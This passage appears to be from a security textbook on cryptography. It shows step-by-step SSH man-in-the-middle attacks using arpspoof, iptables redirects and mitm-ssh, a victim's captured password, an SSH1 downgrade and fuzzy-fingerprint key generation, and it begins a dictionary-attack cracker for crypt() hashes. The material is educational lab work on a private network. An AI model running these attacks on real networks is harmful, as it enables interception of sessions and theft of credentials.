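x = 4	21^4 (mod 143) = 1
x = 5	21^5 (mod 143) = 21
x = 6	21^6 (mod 143) = 12
x = 7	21^7 (mod 143) = 109
x = 8	21^8 (mod 143) = 1

Here the period is easy to determine by eye: R is 4. Armed with this information, gcd(21² – 1, 143) and gcd(21² + 1, 143) should produce at least one of the factors. This time, both factors actually appear, since gcd(440, 143) = 11 and gcd(442, 143) = 13. These factors can then be used to recalculate the private key for the previous RSA example.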

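Hybrid Ciphers

A hybrid cryptosystem gets the best of both worlds. An asymmetric cipher is used to exchange a randomly generated key that is used to encrypt the remaining communications with a symmetric cipher. This provides the speed and efficiency of a symmetric cipher, while solving the dilemma of secure key exchange. Hybrid ciphers are used by most modern cryptographic applications, such as SSL, SSH, and PGP.

Since most applications use ciphers that are resistant to cryptanalysis, attacking the cipher usually won't work. However, if an attacker can intercept communications between both parties and masquerade as one or the other, the key exchange algorithm can be attacked.

Man-in-the-Middle Attacks

A man-in-the-middle (MitM) attack is a clever way to circumvent encryption. The attacker sits between the two communicating parties, with each party believing they are communicating with the other party, but both are communicating with the attacker.

When an encrypted connection between the two parties is established, a secret key is generated and transmitted using an asymmetric cipher. Usually, this key is used to encrypt further communication between the two parties. Since the key is securely transmitted and the subsequent traffic is secured by the key, all of this traffic is unreadable by any would-be attacker sniffing these packets.

However, in an MitM attack, party A believes that she is communicating with B, and party B believes he is communicating with A, but in reality, both are communicating with the attacker. So, when A negotiates an encrypted connection with B, A is actually opening an encrypted connection with the attacker, which means the attacker securely communicates with an asymmetric cipher and learns the secret key. Then the attacker just needs to open another encrypted connection with B, and B will believe that he is communicating with A, as shown in the following illustration.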

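Figure 0x700-1.

This means that the attacker actually maintains two separate encrypted communication channels with two different encryption keys. Packets from A are encrypted with the first key and sent to the attacker, which A believes is actually B. The attacker then decrypts these packets with the first key and re-encrypts them with the second key. Then the attacker sends the newly encrypted packets to B, and B believes these packets are actually being sent by A. By sitting in the middle and maintaining two separate keys, the attacker is able to sniff and even modify traffic between A and B without either side being the wiser.

After redirecting traffic with the ARP redirection technique from "Active Sniffing," a number of SSH man-in-the-middle attack tools can be used. Most of these are just modifications of the existing openssh source code. One notable example is the aptly named mitm-ssh package by Claes Nyberg, which has been included on the LiveCD. There are other tools that do this; however, mitm-ssh is publicly available and the most robust. The source package is on the LiveCD in /usr/src/mitm-ssh, and it has already been built and installed. When running, it accepts connections on a given port and then proxies these connections to the real destination IP address of the target SSH server. With the help of arpspoof to poison ARP caches, traffic to the target SSH server can be redirected to the attacker's machine running mitm-ssh. Since this program listens on localhost, some IP filtering rules are needed to redirect the traffic.

In the example below, the target SSH server is at 192.168.42.72. When mitm-ssh is run, it will listen on port 2222, so it doesn't need to be run as root. The iptables command tells Linux to redirect all incoming TCP connections on port 22 to localhost 2222, where mitm-ssh will be listening.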

reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  anywhere             anywhere            tcp dpt:ssh redir ports 2222

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
reader@hacking:~ $ mitm-ssh

 ..  
/|\    SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_    By CMN <cmn@darklab.org>

Usage: mitm-ssh <non-nat-route> [option(s)]

Routes:

  <host>[:<port>]  - Static route to port on host
                    (for non NAT connections)
Options:
  -v             - Verbose output
  -n             - Do not attempt to resolve hostnames
  -d             - Debug, repeat to increase verbosity
  -p port        - Port to listen for connections on
  -f configfile  - Configuration file to read

Log Options:
  -c logdir      - Log data from client in directory
  -s logdir      - Log data from server in directory
  -o file        - Log passwords to file

reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.

Then in another terminal window on the same machine, Dug Song's arpspoof tool is used to poison ARP caches and redirect traffic destined for 192.168.42.72 to our machine instead.

reader@hacking:~ $ arpspoof
Version: 2.3
Usage: arpspoof [-i interface] [-t target] host
reader@hacking:~ $ sudo arpspoof -i eth0 192.168.42.72
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c 
0:12:3f:7:39:9c ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.42.72 is-at 0:12:3f:7:39:9c

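The MitM attack is now all set up and ready for the next unsuspecting victim. The output below is from another machine on the network (192.168.42.250), which makes an SSH connection to 192.168.42.72.

On Machine 192.168.42.250 (tetsuo), Connecting to 192.168.42.72 (loki)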

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is 84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password: 
Last login: Mon Oct  1 06:32:37 2007 from 192.168.42.72
Linux loki 2.6.20-16-generic #2 SMP Thu Jun 7 20:19:32 UTC 2007 i686

jose@loki:~ $ ls -a
.  ..  .bash_logout  .bash_profile  .bashrc  .bashrc.swp  .profile  Examples
jose@loki:~ $ id
uid=1001(jose) gid=1001(jose) groups=1001(jose)
jose@loki:~ $ exit
logout

Connection to 192.168.42.72 closed. 

iz@tetsuo:~ $

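Everything seems okay, and the connection appears to be secure. However, the connection was secretly routed through the attacker's machine, which used a separate encrypted connection back to the target server. Back on the attacker's machine, everything about the connection has been logged.

On the Attacker's Machine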

reader@hacking:~ $ sudo mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
WARNING: /usr/local/etc/moduli does not exist, using fixed modulus
[MITM] Found real target 192.168.42.72:22 for NAT host 192.168.42.250:1929
[MITM] Routing SSH2 192.168.42.250:1929 -> 192.168.42.72:22

[2007-10-01 13:33:42] MITM (SSH2) 192.168.42.250:1929 -> 192.168.42.72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt

[MITM] Connection from UNKNOWN:1929 closed
reader@hacking:~ $ ls /usr/local/var/log/mitm-ssh/
passwd.log
ssh2 192.168.42.250:1929 <- 192.168.42.72:22
ssh2 192.168.42.250:1929 -> 192.168.42.72:22
reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/passwd.log 
[2007-10-01 13:33:42] MITM (SSH2) 192.168.42.250:1929 -> 192.168.42.72:22
SSH2_MSG_USERAUTH_REQUEST: jose ssh-connection password 0 sP#byp%srt

reader@hacking:~ $ cat /usr/local/var/log/mitm-ssh/ssh2*
Last login: Mon Oct  1 06:32:37 2007 from 192.168.42.72
Linux loki 2.6.20-16-generic #2 SMP Thu Jun 7 20:19:32 UTC 2007 i686
jose@loki:~ $ ls -a
.  ..  .bash_logout  .bash_profile  .bashrc  .bashrc.swp  .profile  Examples
jose@loki:~ $ id
uid=1001(jose) gid=1001(jose) groups=1001(jose)
jose@loki:~ $ exit 
logout

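Since the authentication was actually redirected, with the attacker's machine acting as a proxy, the password sP#byp%srt could be sniffed. In addition, the data transmitted during the connection is captured, showing the attacker everything the victim did during the SSH session.

The attacker's ability to masquerade as either party is what makes this type of attack possible. SSL and SSH were designed with this in mind and have protections against identity spoofing. SSL uses certificates to validate identity, and SSH uses host fingerprints. If the attacker doesn't have the proper certificate or fingerprint for B when A attempts to open an encrypted communication channel with the attacker, the signatures won't match and A will be alerted with a warning.

In the previous example, 192.168.42.250 (tetsuo) had never previously communicated over SSH with 192.168.42.72 (loki) and therefore didn't have a host fingerprint. The host fingerprint that it accepted was actually the fingerprint generated by mitm-ssh. If, however, 192.168.42.250 (tetsuo) had a host fingerprint for 192.168.42.72 (loki), the whole attack would have been detected, and the user would have been presented with a very blatant warning: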

iz@tetsuo:~ $ ssh jose@192.168.42.72
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
84:7a:71:58:0f:b5:5e:1b:17:d7:b5:9c:81:5a:56:7c.
Please contact your system administrator.
Add correct host key in /home/jon/.ssh/known_hosts to get rid of this message.
Offending key in /home/jon/.ssh/known_hosts:1
RSA host key for 192.168.42.72 has changed and you have requested strict checking.
Host key verification failed. 
iz@tetsuo:~ $

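The openssh client will actually prevent the user from connecting until the old host fingerprint has been removed. However, many Windows SSH clients don't enforce these rules as strictly and will present the user with an "Are you sure you want to continue?" dialog box. An uninformed user might just click right through the warning.

Differing SSH Protocol Host Fingerprints

SSH host fingerprints do have a few vulnerabilities. These vulnerabilities have been compensated for in the most recent versions of openssh, but they still exist in older implementations.

Usually, the first time an SSH connection is made to a new host, that host's fingerprint is added to a known_hosts file, as shown here: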

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password: <ctrl-c>
iz@tetsuo:~ $ grep 192.168.42.72 ~/.ssh/known_hosts 
192.168.42.72 ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU= 
iz@tetsuo:~ $

However, there are two different protocols of SSH, SSH1 and SSH2, each with separate host fingerprints.

iz@tetsuo:~ $ rm ~/.ssh/known_hosts 
iz@tetsuo:~ $ ssh -1 jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA1 key fingerprint is e7:c4:81:fe:38:bc:a8:03:f9:79:cd:16:e9:8f:43:55.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed.
iz@tetsuo:~ $ ssh -2 jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? no
Host key verification failed. 
iz@tetsuo:~ $

The banner presented by the SSH server describes which SSH protocols it understands (highlighted below):

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.99-OpenSSH_3.9p1`

Connection closed by foreign host.
iz@tetsuo:~ $ telnet 192.168.42.1 22
Trying 192.168.42.1...
Connected to 192.168.42.1.
Escape character is '^]'.
`SSH-2.0-OpenSSH_4.3p2 Debian-8ubuntu1`

Connection closed by foreign host.
iz@tetsuo:~ $

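The banner from 192.168.42.72 (loki) includes the string SSH-1.99, which, by convention, means that the server speaks both protocols 1 and 2. Often, the SSH server will be configured with a line like Protocol 2,1, which also means the server speaks both protocols and tries to use SSH2 if possible. This is to retain backward compatibility, so SSH1-only clients can still connect.

In contrast, the banner from 192.168.42.1 includes the string SSH-2.0, which shows that the server only speaks protocol 2. In this case, it's obvious that any clients connecting to it have only communicated with SSH2 and therefore only have host fingerprints for protocol 2.

The same is true for loki (192.168.42.72); however, loki also accepts SSH1, which has a different set of host fingerprints. It's unlikely that a client will have used SSH1, so it won't have stored a host fingerprint for this protocol yet.

If the modified SSH daemon being used for the MitM attack forces the client to communicate using the other protocol, no host fingerprint will be found. Instead of being presented with a lengthy warning, the user will simply be asked to add the new fingerprint. The mitm-ssh tool uses a configuration file similar to openssh's, since it's built from that code. By adding the line Protocol 1 to /usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will claim it only speaks the SSH1 protocol.

The output below shows that loki's SSH server usually speaks using both the SSH1 and SSH2 protocols, but when mitm-ssh is put in the middle using the new configuration file, the fake server claims it only speaks the SSH1 protocol.

From 192.168.42.250 (tetsuo), Just an Innocent Machine on the Network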

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.99-OpenSSH_3.9p1`

Connection closed by foreign host.
iz@tetsuo:~ $ rm ~/.ssh/known_hosts 
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
jose@192.168.42.72's password:  

iz@tetsuo:~ $

On the Attacker's Machine, Setting Up mitm-ssh to Only Use the SSH1 Protocol

reader@hacking:~ $ echo "Protocol 1" >> /usr/local/etc/mitm-ssh_config 
reader@hacking:~ $ tail /usr/local/etc/mitm-ssh_config 
# Where to store passwords
#PasswdLogFile /var/log/mitm-ssh/passwd.log

# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh

# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh

`Protocol 1`
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key. 
RSA key generation complete.

Now Back on 192.168.42.250 (tetsuo)

iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
`SSH-1.5-OpenSSH_3.9p1`

Connection closed by foreign host.

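Usually, clients such as tetsuo connecting to loki at 192.168.42.72 would have only communicated using SSH2. Therefore, there would only be a host fingerprint for SSH protocol 2 stored on the client. When protocol 1 is forced by the MitM attack, the attacker's fingerprint won't be compared to the stored fingerprint, due to the differing protocols. Older implementations will simply ask to add this fingerprint since, technically, no host fingerprint exists for this protocol. This is shown in the output below.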

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6.
Are you sure you want to continue connecting (yes/no)?

Since this vulnerability was made public, newer implementations of OpenSSH have a slightly more verbose warning:

iz@tetsuo:~ $ ssh jose@192.168.42.72
WARNING: RSA key found for host 192.168.42.72
in /home/iz/.ssh/known_hosts:1
RSA key fingerprint ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established
but keys of different type are already known for this host.
RSA1 key fingerprint is 45:f7:8d:ea:51:0f:25:db:5a:4b:9e:6a:d6:3c:d0:a6.
Are you sure you want to continue connecting (yes/no)?

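This modified warning isn't as strong as the warning given when host fingerprints of the same protocol don't match. Also, since not all clients will be up to date, this technique can still prove to be useful for an MitM attack.

Fuzzy Fingerprints

Konrad Rieck had an interesting idea regarding SSH host fingerprints. Often, a user will connect to a server from several different clients. The host fingerprint will be displayed and added each time a new client is used, and a security-conscious user will tend to remember the general structure of the host fingerprint. While no one actually memorizes the entire fingerprint, major changes can be detected with little effort. Having a general idea of what the host fingerprint looks like when connecting from a new client greatly increases the security of that connection. If an MitM attack is attempted, the blatant difference in host fingerprints can usually be detected by eye.

However, the eye and the brain can be tricked. Certain fingerprints will look very similar to others. The digits 1 and 7 look very similar, depending on the display font. Usually, the hex digits found at the beginning and end of the fingerprint are remembered with the greatest clarity, while the middle tends to be a bit hazy. The goal behind the fuzzy fingerprint technique is to generate a host key with a fingerprint that looks similar enough to the original fingerprint to fool the human eye.

The openssh package provides tools to retrieve the host key from servers.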

reader@hacking:~ $ ssh-keyscan -t rsa 192.168.42.72 > loki.hostkey
# 192.168.42.72 SSH-1.99-OpenSSH_3.9p1
reader@hacking:~ $ cat loki.hostkey 
192.168.42.72 ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAIEA8Xq6H28EOiCbQaFbIzPtMJSc316SH4aOijgkf7nZnH4LirNziH5upZmk4/
JSdBXcQohiskFFeHadFViuB4xIURZeF3Z7OJtEi8aupf2pAnhSHF4rmMV1pwaSuNTahsBoKOKSaTUOW0RN/1t3G/
52KTzjtKGacX4gTLNSc8fzfZU=
reader@hacking:~ $ ssh-keygen -l -f loki.hostkey 
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72 
reader@hacking:~ $

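Now that the fingerprint format is known for the host key of 192.168.42.72 (loki), fuzzy fingerprints can be generated that look similar. A program that does this has been developed by Rieck and is available at www.thc.org/thc-ffp/. The following output shows the creation of some fuzzy fingerprints for 192.168.42.72 (loki).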

reader@hacking:~ $ ffp
Usage: ffp [Options]
Options:
  -f type       Specify type of fingerprint to use [Default: md5]
                Available: md5, sha1, ripemd
  -t hash       Target fingerprint in byte blocks. 
                Colon-separated: 01:23:45:67... or as string 01234567...
  -k type       Specify type of key to calculate [Default: rsa]
                Available: rsa, dsa
  -b bits       Number of bits in the keys to calculate [Default: 1024]
  -K mode       Specify key calulation mode [Default: sloppy]
                Available: sloppy, accurate
  -m type       Specify type of fuzzy map to use [Default: gauss]
                Available: gauss, cosine
  -v variation  Variation to use for fuzzy map generation [Default: 7.3]
  -y mean       Mean value to use for fuzzy map generation [Default: 0.14]
  -l size       Size of list that contains best fingerprints [Default: 10]
  -s filename   Filename of the state file [Default: /var/tmp/ffp.state]
  -e            Extract SSH host key pairs from state file
  -d directory  Directory to store generated ssh keys to [Default: /tmp]
  -p period     Period to save state file and display state [Default: 60]
  -V            Display version information
No state file /var/tmp/ffp.state present, specify a target hash.
reader@hacking:~ $ ffp -f md5 -k rsa -b 1024 -t ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:
10:59:a0
---[Initializing]---------------------------------------------------------------
 Initializing Crunch Hash: Done
   Initializing Fuzzy Map: Done
 Initializing Private Key: Done
   Initializing Hash List: Done
   Initializing FFP State: Done
---[Fuzzy Map]------------------------------------------------------------------
    Length: 32
      Type: Inverse Gaussian Distribution
       Sum: 15020328
 Fuzzy Map:  10.83% | 9.64% : 8.52% | 7.47% : 6.49% | 5.58% : 4.74% | 3.96% :
             3.25% | 2.62% : 2.05% | 1.55% : 1.12% | 0.76% : 0.47% | 0.24% :
             0.09% | 0.01% : 0.00% | 0.06% : 0.19% | 0.38% : 0.65% | 0.99% :
             1.39% | 1.87% : 2.41% | 3.03% : 3.71% | 4.46% : 5.29% | 6.18% :

---[Current Key]----------------------------------------------------------------
               Key Algorithm: RSA (Rivest Shamir Adleman)
        Key Bits / Size of n: 1024 Bits
                Public key e: 0x10001
 Public Key Bits / Size of e: 17 Bits
        Phi(n) and e r.prime: Yes
             Generation Mode: Sloppy

 State File: /var/tmp/ffp.state
 Running...

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 00m 00s | Total:          0k hashs | Speed:      nan hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: 6a:06:f9:a6:cf:09:19:af:c3:9d:c5:b9:91:a4:8d:81
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 25.652482%

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 01m 00s | Total:       7635k hashs | Speed:   127242 hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: ba:06:3a:8c:bc:73:24:64:5b:8a:6d:fa:a6:1c:09:80
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 55.471931%

---[Current State]--------------------------------------------------------------
 Running:   0d 00h 02m 00s | Total:      15370k hashs | Speed:   128082 hashs/s 
--------------------------------------------------------------------------------
 Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
   Hash Algorithm: Message Digest 5 (MD5)
      Digest Size: 16 Bytes / 128 Bits
   Message Digest: ba:06:3a:8c:bc:73:24:64:5b:8a:6d:fa:a6:1c:09:80
    Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
    Fuzzy Quality: 55.471931%

.:[ output trimmed ]:.
---[Current State]--------------------------------------------------------------
Running: 1d 05h 06m 00s | Total: 13266446k hashs | Speed: 126637 hashs/s 
--------------------------------------------------------------------------------
Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
Hash Algorithm: Message Digest 5 (MD5)
Digest Size: 16 Bytes / 128 Bits
Message Digest: ba:0d:7f:d2:64:76:b8:9c:f1:22:22:87:b0:26:59:50
Target Digest: ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0
Fuzzy Quality: 70.158321%

--------------------------------------------------------------------------------
Exiting and saving state file /var/tmp/ffp.state 
reader@hacking:~ $

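This fuzzy fingerprint generation process can go on for as long as desired. The program keeps track of some of the best fingerprints and will display them periodically. All of the state information is stored in /var/tmp/ffp.state, so the program can be exited with CTRL-C and then resumed later by simply running ffp without any arguments.

After running for a while, SSH host key pairs can be extracted from the state file with the -e switch.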

reader@hacking:~ $ ffp -e -d /tmp
---[Restoring]------------------------------------------------------------------
   Reading FFP State File: Done
    Restoring environment: Done
 Initializing Crunch Hash: Done
--------------------------------------------------------------------------------
 Saving SSH host key pairs: [00] [01] [02] [03] [04] [05] [06] [07] [08] [09] 
reader@hacking:~ $ ls /tmp/ssh-rsa*
/tmp/ssh-rsa00      /tmp/ssh-rsa02.pub  /tmp/ssh-rsa05      /tmp/ssh-rsa07.pub
/tmp/ssh-rsa00.pub  /tmp/ssh-rsa03      /tmp/ssh-rsa05.pub  /tmp/ssh-rsa08
/tmp/ssh-rsa01      /tmp/ssh-rsa03.pub  /tmp/ssh-rsa06      /tmp/ssh-rsa08.pub
/tmp/ssh-rsa01.pub  /tmp/ssh-rsa04      /tmp/ssh-rsa06.pub  /tmp/ssh-rsa09
/tmp/ssh-rsa02      /tmp/ssh-rsa04.pub  /tmp/ssh-rsa07      /tmp/ssh-rsa09.pub 
reader@hacking:~ $

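In the previous example, 10 public and private host key pairs have been generated. Fingerprints for these key pairs can then be generated and compared with the original fingerprint, as seen in the following output.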

reader@hacking:~ $ for i in $(ls -1 /tmp/ssh-rsa*.pub)
> do
> ssh-keygen -l -f $i
> done
1024 ba:0d:7f:d2:64:76:b8:9c:f1:22:22:87:b0:26:59:50 /tmp/ssh-rsa00.pub
1024 ba:06:7f:12:bd:8a:5b:5c:eb:dd:93:ec:ec:d3:89:a9 /tmp/ssh-rsa01.pub
`1024 ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0 /tmp/ssh-rsa02.pub`
1024 ba:06:49:d4:b9:d4:96:4b:93:e8:5d:00:bd:99:53:a0 /tmp/ssh-rsa03.pub
1024 ba:06:7c:d2:15:a2:d3:0d:bf:f0:d4:5d:c6:10:22:90 /tmp/ssh-rsa04.pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05.pub
1024 ba:06:78:dc:be:a6:43:15:eb:3f:ac:92:e5:8e:c9:50 /tmp/ssh-rsa06.pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07.pub
1024 ba:06:7d:e8:94:ad:eb:95:d2:c5:1e:6d:19:53:59:a0 /tmp/ssh-rsa08.pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09.pub
reader@hacking:~ $ ssh-keygen -l -f ./loki.hostkey 
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72 
reader@hacking:~ $

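From the 10 generated key pairs, the one that looks most similar can be picked out by eye. In this case, ssh-rsa02.pub was chosen. Regardless of which key pair is chosen, though, it will certainly look more like the original fingerprint than any randomly generated key would.

This new key can be used with mitm-ssh to make for an even more effective attack. The location of the host key is specified in the configuration file, so using the new key is simply a matter of adding a HostKey line to /usr/local/etc/mitm-ssh_config, as shown below. Since the Protocol 1 line added earlier needs to be removed, the output below simply overwrites the configuration file.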

reader@hacking:~ $ echo "HostKey /tmp/ssh-rsa02" > /usr/local/etc/mitm-ssh_config 
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
Disabling protocol version 1. Could not load host key
SSH MITM Server listening on 0.0.0.0 port 2222.

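In another terminal window, arpspoof is running to redirect traffic to mitm-ssh, which uses the new host key with the fuzzy fingerprint. The output below compares what a client would see when connecting.

Normal Connection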

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)?

MitM-Attacked Connection

iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0.
Are you sure you want to continue connecting (yes/no)?

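Can you immediately tell the difference? These fingerprints look similar enough to trick most people into simply accepting the connection.

Password Cracking

Passwords aren't generally stored in plaintext form. A file containing all the passwords in plaintext would be far too attractive a target, so instead a one-way hash function is used. The best known of these functions is based on DES and is called crypt(), which is described in the manual page shown below.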

NAME
       crypt - password and data encryption

SYNOPSIS
       #define _XOPEN_SOURCE
       #include <unistd.h>

       char *crypt(const char *key, const char *salt);

DESCRIPTION
       crypt()  is  the  password  encryption  function.  It is based on the Data
       Encryption  Standard  algorithm  with  variations  intended  (among  other
       things) to discourage use of hardware implementations of a key search.

       key is a user's typed password.

       salt  is  a  two-character string chosen from the set [a-zA-Z0-9./].  This 
       string is used to perturb the algorithm in one of 4096 different ways.

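This is a one-way hash function that expects a plaintext password and a salt value as input, and then outputs a hash with the salt value prepended to it. The hash is mathematically irreversible, meaning that the original password cannot be determined from the hash alone. Writing a quick program to experiment with this function will help clear up any confusion.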

`crypt_test.c`

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>   // exit()

int main(int argc, char *argv[]) {
   if(argc < 3) {  // Both the password and the salt are required.
      printf("Usage: %s <plaintext password> <salt value>\n", argv[0]);
      exit(1);
   }
   printf("password \"%s\" with salt \"%s\" ", argv[1], argv[2]);
   printf("hashes to ==> %s\n", crypt(argv[1], argv[2])); 
}

When this program is compiled, the crypt library needs to be linked. This is shown in the following output, along with some test runs.

reader@hacking:~/booksrc $ gcc -o crypt_test crypt_test.c 
/tmp/cccrSvYU.o: In function `main':
crypt_test.c:(.text+0x73): undefined reference to `crypt'
collect2: ld returned 1 exit status
reader@hacking:~/booksrc $ gcc -o crypt_test crypt_test.c -l crypt
reader@hacking:~/booksrc $ ./crypt_test testing je
password "testing" with salt "je" hashes to ==> jeLu9ckBgvgX.
reader@hacking:~/booksrc $ ./crypt_test test je
password "test" with salt "je" hashes to ==> jeHEAX1m66RV.
reader@hacking:~/booksrc $ ./crypt_test test xy
password "test" with salt "xy" hashes to ==> xyVSuHLjceD92 
reader@hacking:~/booksrc $

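Notice that in the last two runs, the same password is encrypted, but with different salt values. The salt value perturbs the algorithm further, so the same plaintext can have multiple hash values when different salts are used. The hash value (including the prepended salt) is stored in the password file, on the premise that if an attacker were to steal the password file, the hashes would be useless.

When a legitimate user needs to authenticate using the password hash, that user's hash is looked up in the password file. The user is prompted to enter her password, the original salt value is extracted from the password file, and whatever the user types is sent through the same one-way hash function with that salt value. If the correct password was entered, the one-way hashing function will produce the same output as the hash stored in the password file. This allows authentication to function as expected, without ever having to store the plaintext password.

Dictionary Attacks

It turns out, however, that the encrypted passwords in the password file aren't so useless after all. Sure, it's mathematically impossible to reverse the hash, but it is possible to quickly hash every word in a dictionary, using the salt value for a specific hash, and then compare the result with that hash. If the hashes match, then that word from the dictionary must be the plaintext password.

A simple dictionary attack program can be whipped up fairly easily. It just needs to read words from a file, hash each one using the proper salt value, and display the word if there is a match. The following source code does this using filestream functions, which are included with stdio.h. These functions are easier to work with, since they wrap up the messiness of open() calls and file descriptors, using FILE structure pointers instead. In the source below, the fopen() call's r argument tells it to open the file for reading. It returns NULL on failure, or a pointer to the open filestream. The fgets() call gets a string from the filestream, up to a maximum length or until it reaches the end of a line. In this case, it's used to read each line from the word-list file. This function also returns NULL on failure, which is used to detect the end of the file.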

crypt_crack.c

#define _XOPEN_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>   // exit()
#include <string.h>   // strncpy(), strlen(), strcmp()

/* Barf a message and exit. */
void barf(char *message, char *extra) {
